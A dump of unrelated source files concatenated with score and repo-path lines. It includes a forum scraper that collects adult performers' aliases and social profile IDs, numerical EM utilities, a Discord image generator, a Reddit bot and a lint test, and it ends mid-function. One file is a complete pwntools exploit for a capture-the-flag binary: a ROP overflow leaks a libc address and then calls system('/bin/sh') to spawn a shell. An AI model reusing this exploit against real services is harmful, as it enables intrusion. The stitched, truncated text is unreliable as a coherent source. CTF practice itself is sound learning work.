n_iafd = store["P3869"]
n_egafd = store["P8767"]
n_instagram = store["P2003"]
# Regex patterns.
# link_pat captures (thread id, title) from vBulletin thread links;
# comment_pat captures the start of a row's title attribute (may span lines).
link_pat = re.compile(r'<a href="showthread\.php\?[^"]+" id="thread_title_(\d+)">([^<]*)<\/a>')
comment_pat = re.compile(r'<td class="alt1" id="td_threadtitle_\d+" title="(.*)')
image_pat = re.compile(r'https?:\/\/[^ ]+\.(?:png|jpg|jpeg|gif)', re.IGNORECASE)
# Social-profile URL patterns, keyed by the property they populate.
property_patterns = {
  n_imdb: re.compile(r'https?:\/\/(?:www\.)?imdb\.com\/name\/([^\/\?]+)'),
  n_iafd: re.compile(r'https?:\/\/www\.iafd\.com\/person\.rme\/perfid=(\w+)\/?'),
  n_egafd: re.compile(r'https?:\//www\.egafd\.com\/actresses\/details.php\/id\/(\w\d+)'),
  n_instagram: re.compile(r'https?:\/\/(?:www\.)?instagram\.com\/([^\/\?]+)')
}
# AKA prefix parsing.
# Prefixes that introduce an alias list, and the delimiters used inside one.
aka_prefixes = [
  "AKAs -",
  "AKA -",
  "AKA-",
  "AKA-",
  "AKA ",
  "AKA:",
  "Performer AKA",
  "aka",
  "a.k.a.",
  "Aka:",
  "Also known as:",
]
aka_delimiters = [
  "|",
  " - ",
  " aka ",
  ",",
  "/",
]
# Parse forum overview page.
def parse_forum_page(html):
  """Yield blocks of stripped lines, one block per forum thread row.

  Lines before the "<!-- show threads -->" marker are skipped; after it,
  rows are delimited by "</tr><tr>". The trailing block is always yielded,
  even if empty (the caller tolerates empty blocks).
  """
  block = []
  inhdr = True
  for line in html.split("\n"):
    line = line.strip()
    if len(line) == 0: continue
    if inhdr:
      if line == "<!-- show threads -->": inhdr = False
    elif line == "</tr><tr>":
      # Start a fresh list instead of clearing the yielded one: re-using the
      # same list object corrupted earlier blocks for consumers that keep
      # references to them (e.g. list(parse_forum_page(...))).
      yield block
      block = []
    else:
      block.append(line)
  yield block
# Trim name.
def trim_name(name):
  """Cut *name* at the first "(", "[" or "@" (each applied in turn) and
  strip surrounding whitespace and punctuation.

  The original reused the loop variable ``delim`` both as the marker string
  and as the found index; distinct names make the logic readable.
  """
  for marker in ("(", "[", "@"):
    cut = name.find(marker)
    if cut != -1:
      name = name[:cut]
  return name.strip(" \t.,;:")
# Split and trim list of names.
def split_names(names, delimiters):
  """Split *names* on the first matching delimiter and trim each piece.

  Returns the trimmed, de-duplicated non-empty parts; when no delimiter
  occurs, the trimmed whole string (or an empty list if it trims away).
  """
  for sep in delimiters:
    if sep not in names:
      continue
    collected = []
    for piece in names.split(sep):
      piece = trim_name(piece)
      if piece and piece not in collected:
        collected.append(piece)
    return collected
  whole = trim_name(names)
  return [whole] if whole else []
# Scrape the requested page range, extract one item per thread and store it
# in the forum database keyed by /forum/<forum>/<threadid>.
db = sling.Database(flags.arg.db)
num_threads = 0
for page in range(flags.arg.first, flags.arg.last + 1):
  print("page", page)
  # Fetch forum postings page.
  url = flags.arg.url + "&page=" + str(page)
  u = urllib.parse.urlparse(url)
  baseurl = u.scheme + "://" + u.netloc
  r = requests.get(url)
  # Parse out each forum thread as a separate block.
  for block in parse_forum_page(r.content.decode(errors="ignore")):
    sticky = False
    threadid = None
    title = None
    comment = []
    incomment = False
    #if flags.arg.debug: print("=== block ===\n", "\n".join(block))
    # Parse posting thread info.
    for line in block:
      m = link_pat.match(line)
      if m:
        threadid = m[1]
        title = m[2]
      # The title attribute of the row may continue over several lines until
      # a line ending in '">' closes it.
      m = comment_pat.match(line)
      if m:
        if m[1].endswith('">'):
          comment.append(m[1][:-2])
          incomment = False
        else:
          comment.append(m[1])
          incomment = True
      elif incomment:
        if line.endswith('">'):
          comment.append(line[:-2])
          incomment = False
        else:
          comment.append(line)
      if line == "Sticky:":
        sticky = True
    # Skip sticky threads.
    if sticky: continue
    # Skip untitled threads.
    if title is None: continue
    # Get names and links
    names = split_names(html.unescape(title), ["|", "/"])
    media = []
    props = {}
    description = ""
    for line in comment:
      line = html.unescape(line)
      if line.endswith("..."): line = line[:-3]
      if len(line) == 0: continue
      # Match image urls in comment line.
      urls = image_pat.findall(line)
      if len(urls) > 0:
        for u in urls:
          media.append(u)
          line = line.replace(u, "")
        continue
      # Match aliases in comment line.
      for aka in aka_prefixes:
        if not line.startswith(aka): continue
        aliases = split_names(line[len(aka):], aka_delimiters)
        names.extend(aliases)
        line = ""
        break
      # Match social links.
      for prop, urlpat in property_patterns.items():
        m = urlpat.match(line)
        if m:
          props[prop] = m[1]
          line = ""
          break
      # Anything left over is accumulated into the description.
      line = line.strip()
      if len(line) > 0:
        if len(description) > 0:
          description += "; " + line
        else:
          description = line
    # Output item for thread.
    itemid = "/forum/" + flags.arg.forum + "/" + str(threadid)
    threadurl = baseurl + "/showthread.php?t=" + str(threadid)
    slots = [(n_id, itemid)]
    # First name becomes the canonical name; the rest become aliases.
    # Every name is also recorded under the other-name property.
    first = True
    for name in names:
      if first:
        slots.append((n_name, name))
      else:
        slots.append((n_alias, name))
      slots.append((n_other_name, name))
      first = False
    slots.append((n_description, "forum thread"))
    slots.append((n_instance_of, n_forum_post))
    slots.append((n_described_at_url, threadurl))
    for p, v in props.items():
      slots.append((p, v))
    if flags.arg.images:
      for m in media:
        slots.append((n_media, m))
    if flags.arg.debug:
      print("=========")
      print("thread:", threadid)
      print("url:", threadurl)
      print("title:", title)
      print("names:", names)
      if len(media) > 0: print("media:", media)
      if len(props) > 0: print("props", props)
      if len(description) > 0: print(description)
    else:
      print("thread", threadid, ":", title)
    frame = store.frame(slots)
    if itemid in db:
      print(itemid, "already in forum db")
    else:
      db[itemid] = frame.data(binary=True)
    # NOTE: counts every processed thread, including ones already in the db.
    num_threads += 1
print(num_threads, "forum threads")
db.close()
| 1.898438 | 2 |
CHIMERA/optimization_utils.py | aoyandong/CHIMERA | 2 | 12766824 | """
###########################################################################
# @file optimization_utils.py
# @brief Functions for optimizing transformations and parameters.
#
# @author <NAME>
#
# @Link: https://www.cbica.upenn.edu/sbia/software/
#
# @Contact: <EMAIL>
##########################################################################
"""
import numpy as np
from numpy import transpose as Tr
def initialization(x, y, K):
    """Build the initial parameter dictionary for the EM optimisation.

    x: (D, M) source points; y: (D, N) target points; K: number of
    transformations. Returns uniform soft assignments (delta), the mean
    squared distance between x and the targets (sigsq), stacked identity
    matrices (T) and random translations (t).
    """
    np.random.seed()
    D, M = x.shape
    N = y.shape[1]

    # Uniform assignment of every point to each of the K transformations.
    delta = np.ones((K, M)) / K

    # Average squared distance between every x column and every y column.
    total_sq = 0.0
    for n in range(N):
        diff = x - y[:, n].reshape(-1, 1)
        total_sq += np.sum(np.power(diff, 2))
    sigsq = total_sq / D / M / N

    return {
        'delta': delta,
        'sigsq': sigsq,
        # K copies of the identity transform, stacked along the last axis.
        'T': np.repeat(np.eye(D).reshape(D, D, 1), K, axis=2),
        # Random translations drawn uniformly from [0, 1).
        't': np.random.uniform(size=(D, K)),
    }
def transform(x, params):
    """Apply the delta-weighted affine maps to every column of x.

    Column m of the result is
    sum_k delta[k, m] * (T[:, :, k] @ x[:, m] + t[:, k]).
    """
    T, t, delta = params['T'], params['t'], params['delta']
    D, M = x.shape
    K = T.shape[2]

    out = np.zeros((D, M))
    for k in range(K):
        # Affine image of all points under transform k, weighted per point.
        mapped = np.dot(T[:, :, k], x) + t[:, k].reshape(-1, 1)
        out += delta[k, :] * mapped
    return out
def transform2(x, params):
    """Like transform(), but without the translation component.

    Column m of the result is sum_k delta[k, m] * (T[:, :, k] @ x[:, m]).
    """
    T, delta = params['T'], params['delta']
    D, M = x.shape
    K = T.shape[2]

    out = np.zeros((D, M))
    for k in range(K):
        out += delta[k, :] * np.dot(T[:, :, k], x)
    return out
def transform3(x, params):
    """Apply each of the K affine maps to a single point x of shape (D,).

    Returns a (D, K) array whose k-th column is T[:, :, k] @ x + t[:, k].
    """
    T, t = params['T'], params['t']
    D, K = t.shape
    out = np.zeros((D, K))
    for k in range(K):
        out[:, k] = np.dot(T[:, :, k], x) + t[:, k]
    return out
def Estep(y, yd, ys, tx, xd, xs, sigsq, r, rs):
    """Expectation step: compute the (N x M) assignment probability matrix P.

    Combines squared-distance terms from the imaging features (y vs tx),
    the covariate features (yd vs xd, weighted by r) and the set
    information (ys vs xs, weighted by rs), then row-normalizes
    exp(-dist / (2 * sigsq)) into a probability distribution.

    yd/xd (resp. ys/xs) are only touched when r != 0 (resp. rs != 0).
    """
    M = tx.shape[1]
    N = y.shape[1]

    def _pairwise_sq_dist(a, b):
        # Squared Euclidean distance between every column of a (N of them)
        # and every column of b (M of them), as an (N, M) matrix.
        D1 = np.diag(np.dot(Tr(a), a))
        D2 = np.diag(np.dot(Tr(b), b))
        Mid = 2 * np.dot(Tr(a), b)
        return D1.reshape(-1, 1).repeat(M, axis=1) - Mid + D2.reshape(1, -1).repeat(N, axis=0)

    # Imaging-feature distance is always used.
    tmp1 = _pairwise_sq_dist(y, tx)
    # Covariate / set distances only contribute when their weights are nonzero.
    tmp2 = _pairwise_sq_dist(yd, xd) if r != 0 else np.zeros(tmp1.shape)
    tmp3 = _pairwise_sq_dist(ys, xs) if rs != 0 else np.zeros(tmp1.shape)
    # Combine distances and normalize to a per-row probability distribution.
    # BUGFIX: np.float was removed in NumPy 1.24; the builtin float is the
    # documented replacement, so use np.finfo(float).tiny.
    P = np.exp((-tmp1 - r * tmp2 - rs * tmp3) / 2 / sigsq) + np.finfo(float).tiny
    P = P / np.sum(P, axis=1).reshape(-1, 1)
    return P
def Mstep(y,yd,ys,x,tx,xd,xs,P,params,config):
    """Maximization step: re-estimate sigsq, delta, T and t in place.

    The transformation family is selected by ``config['transform']``
    ('affine', 'duo', or translation-only default) and the matching
    solver module is imported lazily.

    NOTE(review): these are implicit top-level imports (Python-2 style);
    under Python 3 the Mstep_* modules must be importable from sys.path,
    not merely live next to this file -- verify packaging.
    """
    if config['transform'] == 'affine':
        from Mstep_affine import solve_sigsq,solve_delta,solve_T,solve_t
    elif config['transform'] == 'duo':
        from Mstep_duo import solve_sigsq,solve_delta,solve_T,solve_t
    else:
        from Mstep_trans import solve_sigsq,solve_delta,solve_T,solve_t
    # params is mutated between calls, so each solver below sees the
    # entries already updated above it.
    params['sigsq'] = solve_sigsq(y,yd,ys,tx,xd,xs,P,params,config)
    params['delta'] = solve_delta(y,x,P,params)
    params['T'] = solve_T(y,x,P,params,config)
    params['t'] = solve_t(y,x,P,params,config)
    return params
def calc_obj(x,y,xd,yd,xs,ys,P,params,config):
    """Evaluate the EM objective for the current parameters.

    The objective is the P-weighted squared reconstruction error between
    the targets y and the transformed sources tx (plus the covariate term
    weighted by r and the set term weighted by rs), regularized by an L2
    penalty on the translations t (lambda1) and on the deviation of each
    T_k from the identity (lambda2), all scaled by 1/(2*sigsq), plus the
    N*(D+d+ds)/2 * log(sigsq) normalization term.
    """
    lambda1 = config['lambda1']
    lambda2 = config['lambda2']
    r = config['r']
    rs = config['rs']
    K = config['K']
    D,N = y.shape
    M = x.shape[1]
    # d/ds count the extra feature dimensions that enter the log(sigsq) term;
    # they stay 0 unless the corresponding weight is nonzero.
    d = 0
    ds = 0
    IM = np.ones((M,1))
    IN = np.ones((N,1))
    tx = transform(x,params)
    # Frobenius penalty: how far each T_k drifts from the identity.
    tmp = 0
    for i in range(K):
        tmp = tmp + np.power(np.linalg.norm(params['T'][:,:,i]-np.eye(D),'fro'),2)
    # Row/column sums of the responsibility matrix P, as diagonal weights.
    P1 = np.diag(np.dot(P,IM).flatten())
    P2 = np.diag(np.dot(Tr(P),IN).flatten())
    # Weighted squared distance between y and the transformed sources tx.
    term1 = np.trace(y.dot(P1).dot(Tr(y)) - 2*y.dot(P).dot(Tr(tx)) + tx.dot(P2).dot(Tr(tx)))
    term2 = 0
    if r != 0:
        d = xd.shape[0]
        term2 = r * np.trace(yd.dot(P1).dot(Tr(yd)) - 2*yd.dot(P).dot(Tr(xd)) + xd.dot(P2).dot(Tr(xd)))
    term3 = 0
    if rs != 0:
        ds = 1
        term3 = rs * np.trace(ys.dot(P1).dot(Tr(ys)) - 2*ys.dot(P).dot(Tr(xs)) + xs.dot(P2).dot(Tr(xs)))
    obj = 0.5/params['sigsq'] * ( term1 + term2 + term3 \
        + lambda1*np.power(np.linalg.norm(params['t'],'fro'),2) +lambda2*tmp) \
        + N*(D+d+ds)/2.0*np.log(params['sigsq'])
    return obj
| 2.71875 | 3 |
buuctf/97-baby_rop_2/exp.py | RoderickChan/ctf_tasks | 0 | 12766825 | from pwn import *
from LibcSearcher import LibcSearcher
############################
#********修改文件名**********
############################
file_name = 'babyrop2'
port = 27150
io = -1
###########修改宏###########
DEBUG = 1
LOG_PRINT = 1
TMUX = 0
def LOG_ADDR_SUCCESS(name:str, addr:int):
    '''
    Log a resolved address as a success message (when LOG_PRINT is on).

    name: variable name, str
    addr: address value, int (printed in hex)
    '''
    global LOG_PRINT
    if LOG_PRINT:
        log.success('{} ===> {}'.format(name, hex(addr)))
def LOG_SUCCESS(info):
    '''
    Log an arbitrary info message (when LOG_PRINT is on).
    '''
    if LOG_PRINT:
        log.success(info)
def Get_Str_Addr(target_addr:str):
    """
    Return the address of the first occurrence of the given string.

    NOTE(review): .search() is an ELF-object method in pwntools, while
    `io` is assigned a process()/remote() tube below -- confirm this
    helper is meant to run against io_elf instead.
    """
    global io
    return io.search(target_addr.encode()).__next__()
if DEBUG: # attack the local binary
    io = process('./{}'.format(file_name))
    if TMUX:
        context.terminal = ['tmux', 'splitw', '-h']
        gdb.attach(io, gdbscript='b *0x80489a\nc\n')
else: # attack the remote service
    io = remote('node3.buuoj.cn', port)
io_elf = ELF('./{}'.format(file_name))
log.success("libc used ===> {}".format(io_elf.libc))
context.log_level = 'debug'
log.success('='*100)
##########################  attack code below  #######################
##########################  attack code below  #######################
main_addr = io_elf.sym['main']
printf_plt_addr = io_elf.plt['printf']
libc_start_main_got = io_elf.got['__libc_start_main']
# ROP gadgets found in the target binary.
pop_rdi_ret = 0x400733
pop_rsi_r15 = 0x400731
# On 64-bit we need a format string to leak, unlike 32-bit!!
# 64-bit ROP may also need a spare `ret` gadget to keep the stack aligned!!!
format_str_addr = 0x400770
ret_addr = 0x4004d1
LOG_ADDR_SUCCESS('main_addr', main_addr)
LOG_ADDR_SUCCESS('printf_plt_addr', printf_plt_addr)
LOG_ADDR_SUCCESS('libc_start_main_got', libc_start_main_got)
#
io.recvuntil("What's your name? ")
# Stage 1: leak __libc_start_main's runtime address via printf, then
# return to main for a second overflow.
payload = (0x20 + 8) * b'a'
payload += p64(pop_rdi_ret) + p64(format_str_addr) + p64(pop_rsi_r15) + p64(libc_start_main_got) + p64(0) + p64(printf_plt_addr) +p64(ret_addr) + p64(main_addr)
io.sendline(payload)
message = io.recv()
# Userspace libc addresses end with 0x7f; locate the 6 leaked bytes.
index = message.index(b'\x7f')
libc_start_main_addr = message[index - 5: index + 1]
libc_start_main_addr = u64(libc_start_main_addr.ljust(8, b'\x00'))
# Identify the remote libc from the leak and derive system/"/bin/sh".
libc = LibcSearcher('__libc_start_main', libc_start_main_addr)
libc_base_addr = libc_start_main_addr - libc.dump('__libc_start_main')
system_addr = libc_base_addr + libc.dump('system')
str_bin_sh = libc_base_addr + libc.dump('str_bin_sh')
LOG_ADDR_SUCCESS('libc_start_main_addr', libc_start_main_addr)
LOG_ADDR_SUCCESS('libc_base_addr', libc_base_addr)
LOG_ADDR_SUCCESS('sytem_addr', system_addr)
LOG_ADDR_SUCCESS('str_bin_sh', str_bin_sh)
# io.recv()
# Stage 2: ret2libc -- call system("/bin/sh").
payload = (0x20 + 8) * b'a'
payload += p64(pop_rdi_ret) + p64(str_bin_sh) + p64(system_addr) + p64(ret_addr) + p64(main_addr)
io.sendline(payload)
# io.recvuntil('bytes of data!\n')
io.interactive()
API/v1/leaks/__init__.py | FortniteFevers/peely-api | 5 | 12766826 | import io
import json
import math
import random
import time
import traceback
from datetime import datetime
import aiofiles
import discord
import sanic
import sanic.response
from PIL import Image
from discord.ext import commands
from modules import leaks
async def handler(req):
    """Sanic handler: serve the cached leaks-response JSON from disk."""
    return sanic.response.json(json.loads(await (await aiofiles.open(f'Cache/data/resp_leaks.json', mode='r')).read()))
async def generateleaks(data: dict, client: commands.Bot):
    """Render every leaked item onto one composite card image.

    Caches the raw leak payload, generates one card per item, tiles the
    cards onto a background grid, saves both the 'current' PNG and a
    timestamped unique PNG, writes the response metadata JSON, and posts
    progress messages to the Discord status channel.

    Raises FileNotFoundError when the payload contains no items.
    """
    # Cache the raw payload so the API can re-serve it later.
    await (await aiofiles.open('Cache/data/leaks.json', mode='w+')).write(
        json.dumps(data, indent=2))
    start = time.time()
    files = [await leaks.GenerateCard(i) for i in data["data"]["items"]]
    if not files:
        raise FileNotFoundError("No Images")
    await client.get_channel(735018804169670687).send(f"New Leaks detected")
    # Grid sized for all cards: 305x550 per card including 5px gutters.
    result = Image.new("RGBA", (
        round(math.sqrt(len(files)) + 0.45) * 305 - 5, round(math.sqrt(len(files))) * 550 - 5))
    result.paste(Image.open("assets/Images/Backgrounds/Background.png").resize(
        (
            int(round(math.sqrt(len(files)) + 0.45) * 305 - 5),
            int(round(math.sqrt(len(files)) + 0.45) * 550 - 5)),
        Image.ANTIALIAS))
    x = -305
    y = 0
    count = 0
    for img in files:
        try:
            img.thumbnail((305, 550), Image.ANTIALIAS)
            w, h = img.size
            # Wrap to the next row once the current one is full.
            if count >= round(math.sqrt(len(files)) + 0.45):
                y += 550
                x = -305
                count = 0
            x += 305
            count += 1
            result.paste(img, (x, y, x + w, y + h))
        except Exception:
            # BUGFIX: was a bare `except`, which also swallowed
            # KeyboardInterrupt/SystemExit; skip only failing cards.
            continue
    # BUGFIX: Pillow's keyword is `optimize`; `optimized` was silently ignored.
    result.save("cdn/current/leaks.png", optimize=True)
    uniqueimage = str(time.time())
    result.save(f"cdn/unique/leaks_{uniqueimage}.png", optimize=True)
    buffered = io.BytesIO()
    result.save(buffered, format="PNG")
    buffered.seek(0)
    data = {
        "url": "https://api.peely.de/cdn/current/leaks.png",
        "uniqueurl": f"https://api.peely.de/cdn/unique/leaks_{uniqueimage}.png",
        "time": str(datetime.utcnow().__format__('%A, %B %d, %Y'))
    }
    await (await aiofiles.open('Cache/data/resp_leaks.json', mode='w+')).write(
        json.dumps(data, indent=2))
    await client.get_channel(735018804169670687).send(
        f"Updated Leaks. Generating Image in {round(time.time() - start, 2)}sec")
| 2.359375 | 2 |
tests/test_bad_sys_use.py | timgates42/dlint | 0 | 12766827 | #!/usr/bin/env python
from __future__ import (
absolute_import,
division,
print_function,
unicode_literals,
)
import unittest
import dlint
class TestBadSysUse(dlint.test.base.BaseTest):
    """Tests for dlint.linters.BadSysUseLinter."""
    def test_bad_sys_usage(self):
        # Each discouraged sys call (call_tracing/setprofile/settrace)
        # should be flagged once, at its own line, with the linter's
        # standard error template.
        python_string = self.get_ast_node(
            """
            import sys

            sys.call_tracing(lambda: 42, ())
            sys.setprofile(lambda: 42)
            sys.settrace(lambda: 42)
            """
        )
        linter = dlint.linters.BadSysUseLinter()
        linter.visit(python_string)
        result = linter.get_results()
        expected = [
            dlint.linters.base.Flake8Result(
                lineno=4,
                col_offset=0,
                message=dlint.linters.BadSysUseLinter._error_tmpl
            ),
            dlint.linters.base.Flake8Result(
                lineno=5,
                col_offset=0,
                message=dlint.linters.BadSysUseLinter._error_tmpl
            ),
            dlint.linters.base.Flake8Result(
                lineno=6,
                col_offset=0,
                message=dlint.linters.BadSysUseLinter._error_tmpl
            ),
        ]
        assert result == expected
if __name__ == "__main__":
unittest.main()
| 2.328125 | 2 |
lsf/esub.py | mcopik/python-lsf | 12 | 12766828 | #!/usr/bin/env python
"""Wrapper script with bsub functionality."""
from __future__ import print_function
import sys
import os
import shlex
import argparse
from submitjob import submitjob
from utility import color
def esub(args, bsubargs, jobscript):
    """Wrapper script with bsub functionality.

    Merges #BSUB directives embedded in *jobscript* with the command-line
    *bsubargs* (CLI options come last, so they override duplicate script
    directives), then submits the assembled job via submitjob().
    """
    data = {"command": ""}
    scriptargs = []
    # Split the script into the command body and its #BSUB option lines;
    # anything after '#' on a non-directive line is stripped as a comment.
    for line in jobscript.splitlines(True):
        if line.startswith("#!"):
            data["command"] += line
        elif line.startswith("#BSUB "):
            scriptargs += shlex.split(line[6:].split("#")[0])
        else:
            data["command"] += line.split("#")[0]
    bsubargs = scriptargs + bsubargs
    # Tiny state machine: `last` holds an option waiting for its value;
    # `cmd` flips once the job command itself starts.
    last = False
    cmd = False
    for arg in bsubargs:
        if cmd:
            data["command"] += " " + arg
            continue
        if arg[0] == "-":
            if last:
                # Previous option had no value -> record it as a flag.
                data[last] = True
            last = arg
        else:
            if last:
                data[last] = arg
                last = False
            else:
                cmd = True
                data["command"] = arg
    if last:
        # Trailing option without a value is also a flag.
        data[last] = True
    try:
        jobid = submitjob(data)
        print(jobid)
    except Exception as e:
        # NOTE(review): e.strerror is None for non-OSError exceptions --
        # confirm submitjob() only raises OSError-like errors.
        print(color(e.strerror, "r"))
        sys.exit(-1)
def main():
    """Parse arguments, read the job script from stdin, and hand off to esub()."""
    parser = argparse.ArgumentParser(description="Wrapper for bsub.")
    parser.add_argument_group("further arguments",
                              description="are passed to bsub")
    known, passthrough = parser.parse_known_args()
    script_text = sys.stdin.read()
    try:
        esub(known, passthrough, script_text)
    except KeyboardInterrupt:
        # Exit quietly on Ctrl-C.
        pass
if __name__ == "__main__":
main()
| 3.078125 | 3 |
snippets/findtag.py | chengdagong/kdplus | 0 | 12766829 | from pykd import *
from sys import argv
nt = module("nt")
LDR_DATA_TABLE_ENTRY = nt.type("_LDR_DATA_TABLE_ENTRY")
def getModuleList():
    """Return pykd module objects for every entry in nt!PsLoadedModuleList."""
    ldrLst = typedVarList( nt.PsLoadedModuleList, LDR_DATA_TABLE_ENTRY, "InLoadOrderLinks.Flink")
    return [ module(m.DllBase) for m in ldrLst ]
def findTagInModule(mod, tag):
    """Return the addresses of every occurrence of *tag* inside *mod*'s range."""
    begin = mod.begin()
    end = mod.end()
    hits = []
    cursor = begin
    # Walk forward one byte past each hit until no more matches remain.
    while True:
        hit = searchMemory(cursor, end - cursor, tag)
        if not hit:
            break
        hits.append(hit)
        cursor = hit + 1
    return hits
def main():
    # Scan every loaded kernel module for the 4-character tag given on
    # the command line, printing the matching addresses per module.
    if len(argv) < 2:
        print "You should note tag's value"
        return
    if len(argv[1])!=4:
        print "Tag must have 4 symbols length"
        return
    tag = str(argv[1])
    modLst = getModuleList()
    for m in modLst:
        matchLst = findTagInModule( m, tag )
        if len(matchLst) == 0:
            # Quietly skip modules with no hits.
            #print m.name(), "tag not found"
            pass
        else:
            print m.name(), "found", len(matchLst), "entries"
            for offset in matchLst:
                print "\t", hex(offset)
if __name__=="__main__":
main()
| 2.515625 | 3 |
or_suite/envs/general_test.py | JasmineSamadi/ORSuite | 4 | 12766830 | <reponame>JasmineSamadi/ORSuite
import gym
import numpy as np
import sys
from scipy.stats import poisson
import env_configs
import pytest
from stable_baselines3.common.env_checker import check_env
import general_test_helpers
def test_ambulance_metric():
    """Generic environment checks for the metric Ambulance-v0 env."""
    config = env_configs.ambulance_metric_default_config
    general_test_helpers.test_env('Ambulance-v0', config)
def test_ambulance_graph():
    """Generic environment checks for the graph Ambulance-v1 env."""
    config = env_configs.ambulance_graph_default_config
    general_test_helpers.test_env('Ambulance-v1', config)
def test_resource():
    """Generic environment checks for the Resource-v0 env."""
    config = env_configs.resource_allocation_default_config
    general_test_helpers.test_env('Resource-v0', config)
def test_bandit():
    """Generic environment checks for the Bandit-v0 env."""
    config = env_configs.finite_bandit_default_config
    general_test_helpers.test_env('Bandit-v0', config)
def test_vaccine():
    """Generic environment checks for the Vaccine-v0 env."""
    config = env_configs.vaccine_default_config1
    general_test_helpers.test_env('Vaccine-v0', config)
def test_rideshare():
    """Generic environment checks for the Rideshare-v0 env."""
    config = env_configs.rideshare_graph_default_config
    general_test_helpers.test_env('Rideshare-v0', config)
def test_oil():
    """Generic environment checks for the Oil-v0 env."""
    config = env_configs.oil_environment_default_config
    general_test_helpers.test_env('Oil-v0', config)
| 1.75 | 2 |
code/arc101_a_01.py | KoyanagiHitoshi/AtCoder | 3 | 12766831 | <gh_stars>1-10
# ARC101 A: light k of n candles on a line, starting from the origin.
n, k = map(int, input().split())
positions = sorted(map(int, input().split()))
# For each window of k consecutive candles, the walking cost is the
# cheaper of visiting the left end first or the right end first.
def _window_cost(left, right):
    return min(abs(left) + abs(right - left), abs(right) + abs(left - right))
print(min(_window_cost(positions[i], positions[i + k - 1]) for i in range(n - k + 1)))
isup.py | chpwssn/isitupbot | 1 | 12766832 | from specifics import *
import urllib
import urllib2
import json
import praw
import time
urltocheck = "b-15.net http://google.com http://172.16.17.32 https://172.16.17.32"
def runcheck(url):
    # Query every configured check server (from specifics.servers) about
    # *url* and build the Reddit-formatted reply summarizing how many
    # servers connected, resolved DNS, and saw HTTP 200.
    # NOTE(review): this reads the global `mention` set by the main loop
    # below (for footerGen) -- consider passing it as a parameter.
    serverstried = 0
    httpup = 0
    dnsresolve = 0
    serverconnected = 0
    serverids = ""
    servercities = ""
    resolvedto = ""
    for server in servers:
        serverstried += 1
        try:
            data = {"url": url,"api":apikey}
            data = urllib.urlencode(data)
            request = urllib2.Request(server + '?' + data)
            response = urllib2.urlopen(request)
            page = response.read()
            j = json.loads(page)
            print j
            if j:
                servercities += " "+j['city']+", "+j['country']+"."
                serverids += "^"+str(j['serverid'])+" "
                serverconnected += 1
                if j['http'] == 200:
                    httpup += 1
                if j['resolved'] == True:
                    # Only list each distinct resolved address once.
                    if str(j['dns']) not in resolvedto:
                        resolvedto += str(j['dns'])+" "
                    dnsresolve += 1
        except:
            # NOTE(review): bare except silently drops unreachable/broken
            # servers (and any other error) -- consider logging here.
            pass
    # Convert the counters to strings for message interpolation.
    serverstried = str(serverstried)
    serverconnected = str(serverconnected)
    dnsresolve = str(dnsresolve)
    httpup = str(httpup)
    response = ""
    response += "Hello! I\'m the IsItUpBot!\n\nResults for **"+url+"**:"
    response +="\n\nOf the "+serverstried+" servers tried, I connected to "+serverconnected+". They were located in: "+servercities
    response += "\n\n"+dnsresolve+"/"+serverconnected+" servers indicated "+url+" resolved with DNS: "+resolvedto
    response += "\n\n"+httpup+"/"+serverconnected+" servers indicated "+url+" is up."
    response += "\n\n"+footerGen(mention.permalink)+" ^| ^I ^contacted ^servers: "+serverids
    return response
def footerGen(permalink):
    # Build the standard comment footer with report/info links; the
    # permalink is embedded in the error-report compose URL.
    return '[^report ^a ^mistake](http://www.reddit.com/message/compose/?to=chpwssn&subject=IsItUpBot%20Error%20Report&message='+permalink+') ^| [^more ^info](http://www.reddit.com/r/IsItUpBot/wiki/index)'
# Main bot loop: log in, then continuously poll inbox mentions and reply
# with a runcheck() report for every word in each unseen mention.
r = praw.Reddit('IsItUpBot v1.5 by /u/chpwssn. This bot, when summoned, will attempt to connect to the domains/IPs listed in the comment. Useful for seeing if a site is down for everyone or just you.')
r.login(botuser,botpass)
#Open the file used to keep track of the mentions we've already scanned for words
with open("isitupbotscanned.txt") as scannedfile:
    scanned = scannedfile.read().splitlines()
print scanned
done_this_time = set()
loop = True
loops = 0
while loop:
    loops += 1
    # Periodic progress heartbeat.
    if loops%100 == 0:
        print "Done "+str(loops)+" loops, completed: "+str(done_this_time)
    #Get the username mentions we have in our inbox
    mentions = r.get_mentions()
    for mention in mentions:
        #If we haven't scanned the mention yet previously or in this time running the script
        if mention.id not in scanned and mention.id not in done_this_time:
            #Record the mention as scanned in the file and the set
            with open("isitupbotscanned.txt", "a") as scannedfile:
                scannedfile.write(mention.id+'\n')
            done_this_time.add(mention.id)
            print mention
            print mention.id
            words = mention.body.split()
            for word in words:
                # Check every token except the bot's own summon handle.
                if word.lower() != "/u/isitupbot":
                    mention.reply(runcheck(word))
                    time.sleep(2)
python/life/cell.py | PJSoftware/game-of-life | 0 | 12766833 | class Cell:
def __init__(self, alive = False):
self.currentState = alive
self.futureState = alive
def updateState(self, state):
self.futureState = state
def refresh(self):
self.currentState = self.futureState
def isAlive(self):
return self.currentState
def __str__(self):
return "O" if self.currentState else "."
| 3.171875 | 3 |
tpDcc/tools/renamer/plugins/letter.py | tpRigToolkit/tpRigToolkit-tools-renamer | 3 | 12766834 | <gh_stars>1-10
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Module that contains letter renamer plugin implementation
"""
from __future__ import print_function, division, absolute_import
from Qt.QtCore import QObject
from Qt.QtWidgets import QWidget
from tpDcc.managers import resources
from tpDcc.libs.qt.widgets import layouts, buttons, label, switch
from tpDcc.tools.renamer.core import plugin
class LetterRenamerPlugin(plugin.RenamerPlugin):
    """Renamer plugin exposing an A-Z letter picker with a Capital switch."""
    VERSION = '0.0.1'
    ID = 'letter'
    PLUGIN_HEIGHT = 130
    def __init__(self, model, controller, parent=None):
        super(LetterRenamerPlugin, self).__init__(model=model, controller=controller, parent=parent)
    @classmethod
    def create(cls, parent):
        # Factory: wire a fresh model/controller pair into a new plugin.
        model = LetterRenamerPluginModel()
        controller = LetterRenamerPluginController(model=model)
        return cls(model=model, controller=controller, parent=parent)
    @classmethod
    def get_title(cls):
        return 'Letter'
    @classmethod
    def get_icon(cls):
        return resources.icon('letter')
    def get_custom_widget(self):
        """Build the A-Z letter grid plus the capital on/off switch widget."""
        widget = QWidget(parent=self)
        widget_layout = layouts.VerticalLayout(spacing=0, margins=(2, 2, 2, 2))
        widget.setLayout(widget_layout)
        letters_layout = layouts.GridLayout(spacing=2, margins=(0, 0, 0, 0))
        # Lay out up to 14 checkable letter buttons per row; 'A' starts checked.
        i = 0
        j = 0
